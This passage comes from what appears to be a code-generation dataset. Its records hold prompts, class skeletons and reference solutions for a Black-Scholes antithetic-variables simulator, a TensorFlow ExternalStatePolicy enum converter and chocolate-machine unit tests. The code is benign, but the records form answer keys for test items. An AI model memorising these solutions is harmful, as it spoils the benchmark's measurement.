numberOfSimulations : int the number of simulated values of the process at maturity T : float the maturity of the option initialValue : float the initial value of the process sigma : float the standard deviation r : float the interest rate. Default = 0 seed : int the seed to generate the sequence both with standard Monte Carlo and Antithetic variables. Default = None", "name": "__init__", "signature": "def __init__(self, numberOfSimulations, T, initialValue, sigma, r=0, seed=None)"}, {"docstring": "It generates a number N = self.numberOfSimulations of realizations of the log-normal process at time self.T. In particular, it does it by generating N values of standard normal random variables Z(j), j = 1, ..., N, and computing for every j X_T(j) = X_0 exp((r- 0.5 sigma^2) T + sigma T^0.5 Z(j)) Returns ------- blackScholesRealizations : list a vector representing the realizations of the process", "name": "generateRealizations", "signature": "def generateRealizations(self)"}, {"docstring": "It generates a number N = self.numberOfSimulations of realizations of the log-normal process at time self.T. In particular, it does it by first generating N values of standard normal random variables Z(j), j = 1, ..., N/2, Z(n/2+j)=-Z(j), j = 1, ..., N/2 and computing for every j X_T(j) = X_0 exp((r- 0.5 sigma^2) T + sigma T^0.5 Z(j)). If N is odd, N/2 is defined as the smallest integer >= N/2 Returns ------- blackScholesRealizations : list a vector representing the realizations of the process", "name": "generateRealizationsAntitheticVariables", "signature": "def generateRealizationsAntitheticVariables(self)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_005083", "prompt": "Implement the Python class `GenerateBlackScholes` described below.\n\nClass description:\nIn this class we generate N realizations of a log-normal process dX_t = r X_t dt + sigma X_t dW_t at time T>0. We do it by writing X_T = X_0 exp((r- 0.5 sigma^2) T + sigma T^0.5 Z), where Z is a standard normal random variable. We proceed in two different ways: - we generate the N realizations of Z directly; - we first generate N/2 realizations of Z, and then set Z(j+N/2) = - Z(j). The second way accounts for the Antithetic Variables variance reduction method. Attributes ---------- numberOfSimulations : int the number of simulated values of the process at maturity T : float the maturity of the option initialValue : float the initial value of the process sigma : float the standard deviation r\n\nMethod signatures and docstrings:\n- def __init__(self, numberOfSimulations, T, initialValue, sigma, r=0, seed=None): Parameters ---------- numberOfSimulations : int the number of simulated values of the process at maturity T : float the maturity of the option initialValue : float the initial value of the process sigma : float the standard deviation r : float the interest rate. Default = 0 seed : int the seed to generate the sequence both with standard Monte Carlo and Antithetic variables. Default = None\n- def generateRealizations(self): It generates a number N = self.numberOfSimulations of realizations of the log-normal process at time self.T. In particular, it does it by generating N values of standard normal random variables Z(j), j = 1, ..., N, and computing for every j X_T(j) = X_0 exp((r- 0.5 sigma^2) T + sigma T^0.5 Z(j)) Returns ------- blackScholesRealizations : list a vector representing the realizations of the process\n- def generateRealizationsAntitheticVariables(self): It generates a number N = self.numberOfSimulations of realizations of the log-normal process at time self.T. In particular, it does it by first generating N values of standard normal random variables Z(j), j = 1, ..., N/2, Z(n/2+j)=-Z(j), j = 1, ..., N/2 and computing for every j X_T(j) = X_0 exp((r- 0.5 sigma^2) T + sigma T^0.5 Z(j)). If N is odd, N/2 is defined as the smallest integer >= N/2 Returns ------- blackScholesRealizations : list a vector representing the realizations of the process", "prompted_full_text": "Implement the Python class `GenerateBlackScholes` described below.\n\nClass description:\nIn this class we generate N realizations of a log-normal process dX_t = r X_t dt + sigma X_t dW_t at time T>0. We do it by writing X_T = X_0 exp((r- 0.5 sigma^2) T + sigma T^0.5 Z), where Z is a standard normal random variable. We proceed in two different ways: - we generate the N realizations of Z directly; - we first generate N/2 realizations of Z, and then set Z(j+N/2) = - Z(j). The second way accounts for the Antithetic Variables variance reduction method. Attributes ---------- numberOfSimulations : int the number of simulated values of the process at maturity T : float the maturity of the option initialValue : float the initial value of the process sigma : float the standard deviation r\n\nMethod signatures and docstrings:\n- def __init__(self, numberOfSimulations, T, initialValue, sigma, r=0, seed=None): Parameters ---------- numberOfSimulations : int the number of simulated values of the process at maturity T : float the maturity of the option initialValue : float the initial value of the process sigma : float the standard deviation r : float the interest rate. Default = 0 seed : int the seed to generate the sequence both with standard Monte Carlo and Antithetic variables. Default = None\n- def generateRealizations(self): It generates a number N = self.numberOfSimulations of realizations of the log-normal process at time self.T. In particular, it does it by generating N values of standard normal random variables Z(j), j = 1, ..., N, and computing for every j X_T(j) = X_0 exp((r- 0.5 sigma^2) T + sigma T^0.5 Z(j)) Returns ------- blackScholesRealizations : list a vector representing the realizations of the process\n- def generateRealizationsAntitheticVariables(self): It generates a number N = self.numberOfSimulations of realizations of the log-normal process at time self.T. In particular, it does it by first generating N values of standard normal random variables Z(j), j = 1, ..., N/2, Z(n/2+j)=-Z(j), j = 1, ..., N/2 and computing for every j X_T(j) = X_0 exp((r- 0.5 sigma^2) T + sigma T^0.5 Z(j)). If N is odd, N/2 is defined as the smallest integer >= N/2 Returns ------- blackScholesRealizations : list a vector representing the realizations of the process\n\n<|skeleton|>\nclass GenerateBlackScholes:\n \"\"\"In this class we generate N realizations of a log-normal process dX_t = r X_t dt + sigma X_t dW_t at time T>0. We do it by writing X_T = X_0 exp((r- 0.5 sigma^2) T + sigma T^0.5 Z), where Z is a standard normal random variable. We proceed in two different ways: - we generate the N realizations of Z directly; - we first generate N/2 realizations of Z, and then set Z(j+N/2) = - Z(j). The second way accounts for the Antithetic Variables variance reduction method. Attributes ---------- numberOfSimulations : int the number of simulated values of the process at maturity T : float the maturity of the option initialValue : float the initial value of the process sigma : float the standard deviation r\"\"\"\n\n def __init__(self, numberOfSimulations, T, initialValue, sigma, r=0, seed=None):\n \"\"\"Parameters ---------- numberOfSimulations : int the number of simulated values of the process at maturity T : float the maturity of the option initialValue : float the initial value of the process sigma : float the standard deviation r : float the interest rate. Default = 0 seed : int the seed to generate the sequence both with standard Monte Carlo and Antithetic variables. Default = None\"\"\"\n <|body_0|>\n\n def generateRealizations(self):\n \"\"\"It generates a number N = self.numberOfSimulations of realizations of the log-normal process at time self.T. In particular, it does it by generating N values of standard normal random variables Z(j), j = 1, ..., N, and computing for every j X_T(j) = X_0 exp((r- 0.5 sigma^2) T + sigma T^0.5 Z(j)) Returns ------- blackScholesRealizations : list a vector representing the realizations of the process\"\"\"\n <|body_1|>\n\n def generateRealizationsAntitheticVariables(self):\n \"\"\"It generates a number N = self.numberOfSimulations of realizations of the log-normal process at time self.T. In particular, it does it by first generating N values of standard normal random variables Z(j), j = 1, ..., N/2, Z(n/2+j)=-Z(j), j = 1, ..., N/2 and computing for every j X_T(j) = X_0 exp((r- 0.5 sigma^2) T + sigma T^0.5 Z(j)). If N is odd, N/2 is defined as the smallest integer >= N/2 Returns ------- blackScholesRealizations : list a vector representing the realizations of the process\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.numberOfSimulations = numberOfSimulations\n self.T = T\n self.initialValue = initialValue\n self.sigma = sigma\n self.r = r\n np.random.seed(seed)\n<|end_body_0|>\n\n<|body_start_1|>\n standardNormalRealizations = np.random.standard_normal(self.numberOfSimulations)\n firstPart = self.initialValue * math.exp((self.r - 0.5 * self.sigma ** 2) * self.T)\n\n def BSFunction(x):\n return firstPart * math.exp(self.sigma * math.sqrt(self.T) * x)\n blackScholesRealizations = [BSFunction(x) for x in standardNormalRealizations]\n return blackScholesRealizations\n<|end_body_1|>\n\n<|body_start_2|>\n standardNormalRealizations = np.random.standard_normal(math.ceil(self.numberOfSimulations / 2))\n firstPart = self.initialValue * math.exp((self.r - 0.5 * self.sigma ** 2) * self.T)\n blackScholesRealizations = [firstPart * math.exp(self.sigma * math.sqrt(self.T) * x) for x in standardNormalRealizations] + [firstPart * math.exp(self.sigma * math.sqrt(self.T) * -x) for x in standardNormalRealizations]\n return blackScholesRealizations\n<|end_body_2|>\n", "revision_id": "4314e47509b05523ee547be9ba6970870f9bcde0", "skeleton": "<|skeleton|>\nclass GenerateBlackScholes:\n \"\"\"In this class we generate N realizations of a log-normal process dX_t = r X_t dt + sigma X_t dW_t at time T>0. We do it by writing X_T = X_0 exp((r- 0.5 sigma^2) T + sigma T^0.5 Z), where Z is a standard normal random variable. We proceed in two different ways: - we generate the N realizations of Z directly; - we first generate N/2 realizations of Z, and then set Z(j+N/2) = - Z(j). The second way accounts for the Antithetic Variables variance reduction method. Attributes ---------- numberOfSimulations : int the number of simulated values of the process at maturity T : float the maturity of the option initialValue : float the initial value of the process sigma : float the standard deviation r\"\"\"\n\n def __init__(self, numberOfSimulations, T, initialValue, sigma, r=0, seed=None):\n \"\"\"Parameters ---------- numberOfSimulations : int the number of simulated values of the process at maturity T : float the maturity of the option initialValue : float the initial value of the process sigma : float the standard deviation r : float the interest rate. Default = 0 seed : int the seed to generate the sequence both with standard Monte Carlo and Antithetic variables. Default = None\"\"\"\n <|body_0|>\n\n def generateRealizations(self):\n \"\"\"It generates a number N = self.numberOfSimulations of realizations of the log-normal process at time self.T. In particular, it does it by generating N values of standard normal random variables Z(j), j = 1, ..., N, and computing for every j X_T(j) = X_0 exp((r- 0.5 sigma^2) T + sigma T^0.5 Z(j)) Returns ------- blackScholesRealizations : list a vector representing the realizations of the process\"\"\"\n <|body_1|>\n\n def generateRealizationsAntitheticVariables(self):\n \"\"\"It generates a number N = self.numberOfSimulations of realizations of the log-normal process at time self.T. In particular, it does it by first generating N values of standard normal random variables Z(j), j = 1, ..., N/2, Z(n/2+j)=-Z(j), j = 1, ..., N/2 and computing for every j X_T(j) = X_0 exp((r- 0.5 sigma^2) T + sigma T^0.5 Z(j)). If N is odd, N/2 is defined as the smallest integer >= N/2 Returns ------- blackScholesRealizations : list a vector representing the realizations of the process\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class GenerateBlackScholes:\n \"\"\"In this class we generate N realizations of a log-normal process dX_t = r X_t dt + sigma X_t dW_t at time T>0. We do it by writing X_T = X_0 exp((r- 0.5 sigma^2) T + sigma T^0.5 Z), where Z is a standard normal random variable. We proceed in two different ways: - we generate the N realizations of Z directly; - we first generate N/2 realizations of Z, and then set Z(j+N/2) = - Z(j). The second way accounts for the Antithetic Variables variance reduction method. Attributes ---------- numberOfSimulations : int the number of simulated values of the process at maturity T : float the maturity of the option initialValue : float the initial value of the process sigma : float the standard deviation r\"\"\"\n\n def __init__(self, numberOfSimulations, T, initialValue, sigma, r=0, seed=None):\n \"\"\"Parameters ---------- numberOfSimulations : int the number of simulated values of the process at maturity T : float the maturity of the option initialValue : float the initial value of the process sigma : float the standard deviation r : float the interest rate. Default = 0 seed : int the seed to generate the sequence both with standard Monte Carlo and Antithetic variables. Default = None\"\"\"\n self.numberOfSimulations = numberOfSimulations\n self.T = T\n self.initialValue = initialValue\n self.sigma = sigma\n self.r = r\n np.random.seed(seed)\n\n def generateRealizations(self):\n \"\"\"It generates a number N = self.numberOfSimulations of realizations of the log-normal process at time self.T. In particular, it does it by generating N values of standard normal random variables Z(j), j = 1, ..., N, and computing for every j X_T(j) = X_0 exp((r- 0.5 sigma^2) T + sigma T^0.5 Z(j)) Returns ------- blackScholesRealizations : list a vector representing the realizations of the process\"\"\"\n standardNormalRealizations = np.random.standard_normal(self.numberOfSimulations)\n firstPart = self.initialValue * math.exp((self.r - 0.5 * self.sigma ** 2) * self.T)\n\n def BSFunction(x):\n return firstPart * math.exp(self.sigma * math.sqrt(self.T) * x)\n blackScholesRealizations = [BSFunction(x) for x in standardNormalRealizations]\n return blackScholesRealizations\n\n def generateRealizationsAntitheticVariables(self):\n \"\"\"It generates a number N = self.numberOfSimulations of realizations of the log-normal process at time self.T. In particular, it does it by first generating N values of standard normal random variables Z(j), j = 1, ..., N/2, Z(n/2+j)=-Z(j), j = 1, ..., N/2 and computing for every j X_T(j) = X_0 exp((r- 0.5 sigma^2) T + sigma T^0.5 Z(j)). If N is odd, N/2 is defined as the smallest integer >= N/2 Returns ------- blackScholesRealizations : list a vector representing the realizations of the process\"\"\"\n standardNormalRealizations = np.random.standard_normal(math.ceil(self.numberOfSimulations / 2))\n firstPart = self.initialValue * math.exp((self.r - 0.5 * self.sigma ** 2) * self.T)\n blackScholesRealizations = [firstPart * math.exp(self.sigma * math.sqrt(self.T) * x) for x in standardNormalRealizations] + [firstPart * math.exp(self.sigma * math.sqrt(self.T) * -x) for x in standardNormalRealizations]\n return blackScholesRealizations\n", "source": "the_stack_v2_python_sparse", "source_path": "Computational-finance-python/montecarlovariancereduction/antitheticvariables/generateBlackScholes.py", "source_repo": "AndreaMaz/Computational-finance-python", "split": "test", "star_events_count": 1} {"blob_id": "26248d8cfa9c6560e0d2d720c690751411c8fe8d", "bodies": ["if obj == cls.IGNORE:\n return dataset_options_pb2.ExternalStatePolicy.POLICY_IGNORE\nif obj == cls.FAIL:\n return dataset_options_pb2.ExternalStatePolicy.POLICY_FAIL\nif obj == cls.WARN:\n return dataset_options_pb2.ExternalStatePolicy.POLICY_WARN\nraise ValueError('%s._to_proto() is called with undefined enum %s.' % (cls.__name__, obj.name))", "if pb == dataset_options_pb2.ExternalStatePolicy.POLICY_IGNORE:\n return cls.IGNORE\nif pb == dataset_options_pb2.ExternalStatePolicy.POLICY_FAIL:\n return cls.FAIL\nif pb == dataset_options_pb2.ExternalStatePolicy.POLICY_WARN:\n return cls.WARN\nraise ValueError('%s._from_proto() is called with undefined enum %s.' % (cls.__name__, pb))"], "bodies_text": "<|body_start_0|>\n if obj == cls.IGNORE:\n return dataset_options_pb2.ExternalStatePolicy.POLICY_IGNORE\n if obj == cls.FAIL:\n return dataset_options_pb2.ExternalStatePolicy.POLICY_FAIL\n if obj == cls.WARN:\n return dataset_options_pb2.ExternalStatePolicy.POLICY_WARN\n raise ValueError('%s._to_proto() is called with undefined enum %s.' % (cls.__name__, obj.name))\n<|end_body_0|>\n\n<|body_start_1|>\n if pb == dataset_options_pb2.ExternalStatePolicy.POLICY_IGNORE:\n return cls.IGNORE\n if pb == dataset_options_pb2.ExternalStatePolicy.POLICY_FAIL:\n return cls.FAIL\n if pb == dataset_options_pb2.ExternalStatePolicy.POLICY_WARN:\n return cls.WARN\n raise ValueError('%s._from_proto() is called with undefined enum %s.' % (cls.__name__, pb))\n<|end_body_1|>\n", "class_docstring": "Represents how to handle external state during serialization. See the `tf.data.Options.experimental_external_state_policy` documentation for more information.", "class_name": "ExternalStatePolicy", "detected_licenses": ["MIT", "Apache-2.0", "BSD-2-Clause"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass ExternalStatePolicy:\n \"\"\"Represents how to handle external state during serialization. See the `tf.data.Options.experimental_external_state_policy` documentation for more information.\"\"\"\n\n def _to_proto(cls, obj):\n \"\"\"Convert enum to proto.\"\"\"\n <|body_0|>\n\n def _from_proto(cls, pb):\n \"\"\"Convert proto to enum.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if obj == cls.IGNORE:\n return dataset_options_pb2.ExternalStatePolicy.POLICY_IGNORE\n if obj == cls.FAIL:\n return dataset_options_pb2.ExternalStatePolicy.POLICY_FAIL\n if obj == cls.WARN:\n return dataset_options_pb2.ExternalStatePolicy.POLICY_WARN\n raise ValueError('%s._to_proto() is called with undefined enum %s.' % (cls.__name__, obj.name))\n<|end_body_0|>\n\n<|body_start_1|>\n if pb == dataset_options_pb2.ExternalStatePolicy.POLICY_IGNORE:\n return cls.IGNORE\n if pb == dataset_options_pb2.ExternalStatePolicy.POLICY_FAIL:\n return cls.FAIL\n if pb == dataset_options_pb2.ExternalStatePolicy.POLICY_WARN:\n return cls.WARN\n raise ValueError('%s._from_proto() is called with undefined enum %s.' % (cls.__name__, pb))\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000493", "length_bytes": 6002, "license_type": "permissive", "methods": [{"docstring": "Convert enum to proto.", "name": "_to_proto", "signature": "def _to_proto(cls, obj)"}, {"docstring": "Convert proto to enum.", "name": "_from_proto", "signature": "def _from_proto(cls, pb)"}], "n_methods": 2, "prompt": "Implement the Python class `ExternalStatePolicy` described below.\n\nClass description:\nRepresents how to handle external state during serialization. See the `tf.data.Options.experimental_external_state_policy` documentation for more information.\n\nMethod signatures and docstrings:\n- def _to_proto(cls, obj): Convert enum to proto.\n- def _from_proto(cls, pb): Convert proto to enum.", "prompted_full_text": "Implement the Python class `ExternalStatePolicy` described below.\n\nClass description:\nRepresents how to handle external state during serialization. See the `tf.data.Options.experimental_external_state_policy` documentation for more information.\n\nMethod signatures and docstrings:\n- def _to_proto(cls, obj): Convert enum to proto.\n- def _from_proto(cls, pb): Convert proto to enum.\n\n<|skeleton|>\nclass ExternalStatePolicy:\n \"\"\"Represents how to handle external state during serialization. See the `tf.data.Options.experimental_external_state_policy` documentation for more information.\"\"\"\n\n def _to_proto(cls, obj):\n \"\"\"Convert enum to proto.\"\"\"\n <|body_0|>\n\n def _from_proto(cls, pb):\n \"\"\"Convert proto to enum.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if obj == cls.IGNORE:\n return dataset_options_pb2.ExternalStatePolicy.POLICY_IGNORE\n if obj == cls.FAIL:\n return dataset_options_pb2.ExternalStatePolicy.POLICY_FAIL\n if obj == cls.WARN:\n return dataset_options_pb2.ExternalStatePolicy.POLICY_WARN\n raise ValueError('%s._to_proto() is called with undefined enum %s.' % (cls.__name__, obj.name))\n<|end_body_0|>\n\n<|body_start_1|>\n if pb == dataset_options_pb2.ExternalStatePolicy.POLICY_IGNORE:\n return cls.IGNORE\n if pb == dataset_options_pb2.ExternalStatePolicy.POLICY_FAIL:\n return cls.FAIL\n if pb == dataset_options_pb2.ExternalStatePolicy.POLICY_WARN:\n return cls.WARN\n raise ValueError('%s._from_proto() is called with undefined enum %s.' % (cls.__name__, pb))\n<|end_body_1|>\n", "revision_id": "085b20a4b6287eff8c0b792425d52422ab8cbab3", "skeleton": "<|skeleton|>\nclass ExternalStatePolicy:\n \"\"\"Represents how to handle external state during serialization. See the `tf.data.Options.experimental_external_state_policy` documentation for more information.\"\"\"\n\n def _to_proto(cls, obj):\n \"\"\"Convert enum to proto.\"\"\"\n <|body_0|>\n\n def _from_proto(cls, pb):\n \"\"\"Convert proto to enum.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class ExternalStatePolicy:\n \"\"\"Represents how to handle external state during serialization. See the `tf.data.Options.experimental_external_state_policy` documentation for more information.\"\"\"\n\n def _to_proto(cls, obj):\n \"\"\"Convert enum to proto.\"\"\"\n if obj == cls.IGNORE:\n return dataset_options_pb2.ExternalStatePolicy.POLICY_IGNORE\n if obj == cls.FAIL:\n return dataset_options_pb2.ExternalStatePolicy.POLICY_FAIL\n if obj == cls.WARN:\n return dataset_options_pb2.ExternalStatePolicy.POLICY_WARN\n raise ValueError('%s._to_proto() is called with undefined enum %s.' % (cls.__name__, obj.name))\n\n def _from_proto(cls, pb):\n \"\"\"Convert proto to enum.\"\"\"\n if pb == dataset_options_pb2.ExternalStatePolicy.POLICY_IGNORE:\n return cls.IGNORE\n if pb == dataset_options_pb2.ExternalStatePolicy.POLICY_FAIL:\n return cls.FAIL\n if pb == dataset_options_pb2.ExternalStatePolicy.POLICY_WARN:\n return cls.WARN\n raise ValueError('%s._from_proto() is called with undefined enum %s.' % (cls.__name__, pb))\n", "source": "the_stack_v2_python_sparse", "source_path": "tensorflow/python/data/experimental/ops/distribute_options.py", "source_repo": "graphcore/tensorflow", "split": "test", "star_events_count": 84} {"blob_id": "174ef5425da4c050a820da829e8e8bad350e1da7", "bodies": ["CHOICES = ('dark', 'caramel', 'mint', 'surprise', 'stats', 'shutdown')\nchoice = 'dark'\nself.chocolate_machine = ChocolateMachine(CHOICES)\nself.selection = CHOCOLATE_CHOICES[choice]", "d_raw_materials = {'sugar': 2, 'butter': 2, 'caramel': 15, 'dark chocolate': 30, 'mint chocolate': 30, 'milk chocolate': 30, 'light corn syrup': 2, 'sweetened condensed milk': 2, 'vanilla extract': 2, \"Reese's Pieces\": 15}\nreturn_1 = \"sugar 2 tablespoons remaining\\nbutter 2 teaspoons remaining\\ndark chocolate 30 tablespoons remaining\\nmint chocolate 30 tablespoons remaining\\nmilk chocolate 30 tablespoons remaining\\nlight corn syrup 2 teaspoons remaining\\nsweetened condensed milk 2 teaspoons remaining\\nvanilla extract 2 teaspoons remaining\\nReese's Pieces 15 tablespoons remaining\\nTotal Money Collected: $0.00\\n\"\nstring_1 = self.chocolate_machine.stats(d_raw_materials)\nself.assertEqual(string_1, return_1)", "m_raw_materials = self.selection['ingredients']\nd_raw_materials = {'sugar': 2, 'butter': 2, 'caramel': 15, 'dark chocolate': 30, 'mint chocolate': 30, 'milk chocolate': 30, 'light corn syrup': 2, 'sweetened condensed milk': 2, 'vanilla extract': 2, \"Reese's Pieces\": 15}\nreturn_1 = True\nbool_1 = self.chocolate_machine.has_raw_materials(m_raw_materials, d_raw_materials)\nself.assertEqual(bool_1, return_1)", "m_raw_materials = self.selection['ingredients']\nd_raw_materials = {'sugar': 0, 'butter': 0, 'caramel': 15, 'dark chocolate': 0, 'mint chocolate': 30, 'milk chocolate': 30, 'light corn syrup': 0, 'sweetened condensed milk': 0, 'vanilla extract': 0, \"Reese's Pieces\": 15}\nreturn_1 = 'Machine Needs Additional: sugar\\nMachine Needs Additional: butter\\nMachine Needs Additional: dark chocolate\\nMachine Needs Additional: light corn syrup\\nMachine Needs Additional: sweetened condensed milk\\nMachine Needs Additional: vanilla extract\\n'\nbool_1 = self.chocolate_machine.has_raw_materials(m_raw_materials, d_raw_materials)\nself.assertEqual(bool_1, return_1)", "chocolate_choice = 'dark'\nm_raw_materials = self.selection['ingredients']\nd_raw_materials = {'sugar': 2, 'butter': 2, 'caramel': 15, 'dark chocolate': 30, 'mint chocolate': 30, 'milk chocolate': 30, 'light corn syrup': 2, 'sweetened condensed milk': 2, 'vanilla extract': 2, \"Reese's Pieces\": 15}\nreturn_1 = 'A dark chocolate bar dispensed!'\nstring_1 = self.chocolate_machine.bake_chocolate_bar(chocolate_choice, m_raw_materials, d_raw_materials)\nself.assertEqual(string_1, return_1)"], "bodies_text": "<|body_start_0|>\n CHOICES = ('dark', 'caramel', 'mint', 'surprise', 'stats', 'shutdown')\n choice = 'dark'\n self.chocolate_machine = ChocolateMachine(CHOICES)\n self.selection = CHOCOLATE_CHOICES[choice]\n<|end_body_0|>\n\n<|body_start_1|>\n d_raw_materials = {'sugar': 2, 'butter': 2, 'caramel': 15, 'dark chocolate': 30, 'mint chocolate': 30, 'milk chocolate': 30, 'light corn syrup': 2, 'sweetened condensed milk': 2, 'vanilla extract': 2, \"Reese's Pieces\": 15}\n return_1 = \"sugar 2 tablespoons remaining\\nbutter 2 teaspoons remaining\\ndark chocolate 30 tablespoons remaining\\nmint chocolate 30 tablespoons remaining\\nmilk chocolate 30 tablespoons remaining\\nlight corn syrup 2 teaspoons remaining\\nsweetened condensed milk 2 teaspoons remaining\\nvanilla extract 2 teaspoons remaining\\nReese's Pieces 15 tablespoons remaining\\nTotal Money Collected: $0.00\\n\"\n string_1 = self.chocolate_machine.stats(d_raw_materials)\n self.assertEqual(string_1, return_1)\n<|end_body_1|>\n\n<|body_start_2|>\n m_raw_materials = self.selection['ingredients']\n d_raw_materials = {'sugar': 2, 'butter': 2, 'caramel': 15, 'dark chocolate': 30, 'mint chocolate': 30, 'milk chocolate': 30, 'light corn syrup': 2, 'sweetened condensed milk': 2, 'vanilla extract': 2, \"Reese's Pieces\": 15}\n return_1 = True\n bool_1 = self.chocolate_machine.has_raw_materials(m_raw_materials, d_raw_materials)\n self.assertEqual(bool_1, return_1)\n<|end_body_2|>\n\n<|body_start_3|>\n m_raw_materials = self.selection['ingredients']\n d_raw_materials = {'sugar': 0, 'butter': 0, 'caramel': 15, 'dark chocolate': 0, 'mint chocolate': 30, 'milk chocolate': 30, 'light corn syrup': 0, 'sweetened condensed milk': 0, 'vanilla extract': 0, \"Reese's Pieces\": 15}\n return_1 = 'Machine Needs Additional: sugar\\nMachine Needs Additional: butter\\nMachine Needs Additional: dark chocolate\\nMachine Needs Additional: light corn syrup\\nMachine Needs Additional: sweetened condensed milk\\nMachine Needs Additional: vanilla extract\\n'\n bool_1 = self.chocolate_machine.has_raw_materials(m_raw_materials, d_raw_materials)\n self.assertEqual(bool_1, return_1)\n<|end_body_3|>\n\n<|body_start_4|>\n chocolate_choice = 'dark'\n m_raw_materials = self.selection['ingredients']\n d_raw_materials = {'sugar': 2, 'butter': 2, 'caramel': 15, 'dark chocolate': 30, 'mint chocolate': 30, 'milk chocolate': 30, 'light corn syrup': 2, 'sweetened condensed milk': 2, 'vanilla extract': 2, \"Reese's Pieces\": 15}\n return_1 = 'A dark chocolate bar dispensed!'\n string_1 = self.chocolate_machine.bake_chocolate_bar(chocolate_choice, m_raw_materials, d_raw_materials)\n self.assertEqual(string_1, return_1)\n<|end_body_4|>\n", "class_docstring": "Test class to test chocolate_machine module", "class_name": "TestChocolateMachine", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass TestChocolateMachine:\n \"\"\"Test class to test chocolate_machine module\"\"\"\n\n def setUp(self):\n \"\"\"setUp class\"\"\"\n <|body_0|>\n\n def test_stats(self):\n \"\"\"test stats functionality\"\"\"\n <|body_1|>\n\n def test_has_raw_materials(self):\n \"\"\"test has_raw_materials functionality\"\"\"\n <|body_2|>\n\n def test_has_raw_materials_handles_insufficient_raw_materials(self):\n \"\"\"test has_raw_materials handles insufficient raw materials functionality\"\"\"\n <|body_3|>\n\n def test_bake_chocolate_bar(self):\n \"\"\"test bake_chocolate_bar functionality\"\"\"\n <|body_4|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n CHOICES = ('dark', 'caramel', 'mint', 'surprise', 'stats', 'shutdown')\n choice = 'dark'\n self.chocolate_machine = ChocolateMachine(CHOICES)\n self.selection = CHOCOLATE_CHOICES[choice]\n<|end_body_0|>\n\n<|body_start_1|>\n d_raw_materials = {'sugar': 2, 'butter': 2, 'caramel': 15, 'dark chocolate': 30, 'mint chocolate': 30, 'milk chocolate': 30, 'light corn syrup': 2, 'sweetened condensed milk': 2, 'vanilla extract': 2, \"Reese's Pieces\": 15}\n return_1 = \"sugar 2 tablespoons remaining\\nbutter 2 teaspoons remaining\\ndark chocolate 30 tablespoons remaining\\nmint chocolate 30 tablespoons remaining\\nmilk chocolate 30 tablespoons remaining\\nlight corn syrup 2 teaspoons remaining\\nsweetened condensed milk 2 teaspoons remaining\\nvanilla extract 2 teaspoons remaining\\nReese's Pieces 15 tablespoons remaining\\nTotal Money Collected: $0.00\\n\"\n string_1 = self.chocolate_machine.stats(d_raw_materials)\n self.assertEqual(string_1, return_1)\n<|end_body_1|>\n\n<|body_start_2|>\n m_raw_materials = self.selection['ingredients']\n d_raw_materials = {'sugar': 2, 'butter': 2, 'caramel': 15, 'dark chocolate': 30, 'mint chocolate': 30, 'milk chocolate': 30, 'light corn syrup': 2, 'sweetened condensed milk': 2, 'vanilla extract': 2, \"Reese's Pieces\": 15}\n return_1 = True\n bool_1 = self.chocolate_machine.has_raw_materials(m_raw_materials, d_raw_materials)\n self.assertEqual(bool_1, return_1)\n<|end_body_2|>\n\n<|body_start_3|>\n m_raw_materials = self.selection['ingredients']\n d_raw_materials = {'sugar': 0, 'butter': 0, 'caramel': 15, 'dark chocolate': 0, 'mint chocolate': 30, 'milk chocolate': 30, 'light corn syrup': 0, 'sweetened condensed milk': 0, 'vanilla extract': 0, \"Reese's Pieces\": 15}\n return_1 = 'Machine Needs Additional: sugar\\nMachine Needs Additional: butter\\nMachine Needs Additional: dark chocolate\\nMachine Needs Additional: light corn syrup\\nMachine Needs Additional: sweetened condensed milk\\nMachine Needs Additional: vanilla extract\\n'\n bool_1 = self.chocolate_machine.has_raw_materials(m_raw_materials, d_raw_materials)\n self.assertEqual(bool_1, return_1)\n<|end_body_3|>\n\n<|body_start_4|>\n chocolate_choice = 'dark'\n m_raw_materials = self.selection['ingredients']\n d_raw_materials = {'sugar': 2, 'butter': 2, 'caramel': 15, 'dark chocolate': 30, 'mint chocolate': 30, 'milk chocolate': 30, 'light corn syrup': 2, 'sweetened condensed milk': 2, 'vanilla extract': 2, \"Reese's Pieces\": 15}\n return_1 = 'A dark chocolate bar dispensed!'\n string_1 = self.chocolate_machine.bake_chocolate_bar(chocolate_choice, m_raw_materials, d_raw_materials)\n self.assertEqual(string_1, return_1)\n<|end_body_4|>\n", "id": "stack_v2_sparse_classes_10k_test_000494", "length_bytes": 4538, "license_type": "permissive", "methods": [{"docstring": "setUp class", "name": "setUp", "signature": "def setUp(self)"}, {"docstring": "test stats functionality", "name": "test_stats", "signature": "def test_stats(self)"}, {"docstring": "test has_raw_materials functionality", "name": "test_has_raw_materials", "signature": "def test_has_raw_materials(self)"}, {"docstring": "test has_raw_materials handles insufficient raw materials functionality", "name": "test_has_raw_materials_handles_insufficient_raw_materials", "signature": "def test_has_raw_materials_handles_insufficient_raw_materials(self)"}, {"docstring": "test bake_chocolate_bar functionality", "name": "test_bake_chocolate_bar", "signature": "def test_bake_chocolate_bar(self)"}], "n_methods": 5, "original_id": "stack_v2_sparse_classes_30k_train_001288", "prompt": "Implement the Python class `TestChocolateMachine` described below.\n\nClass description:\nTest class to test chocolate_machine module\n\nMethod signatures and docstrings:\n- def setUp(self): setUp class\n- def test_stats(self): test stats functionality\n- def test_has_raw_materials(self): test has_raw_materials functionality\n- def test_has_raw_materials_handles_insufficient_raw_materials(self): test has_raw_materials handles insufficient raw materials functionality\n- def test_bake_chocolate_bar(self): test bake_chocolate_bar functionality", "prompted_full_text": "Implement the Python class `TestChocolateMachine` described below.\n\nClass description:\nTest class to test chocolate_machine module\n\nMethod signatures and docstrings:\n- def setUp(self): setUp class\n- def test_stats(self): test 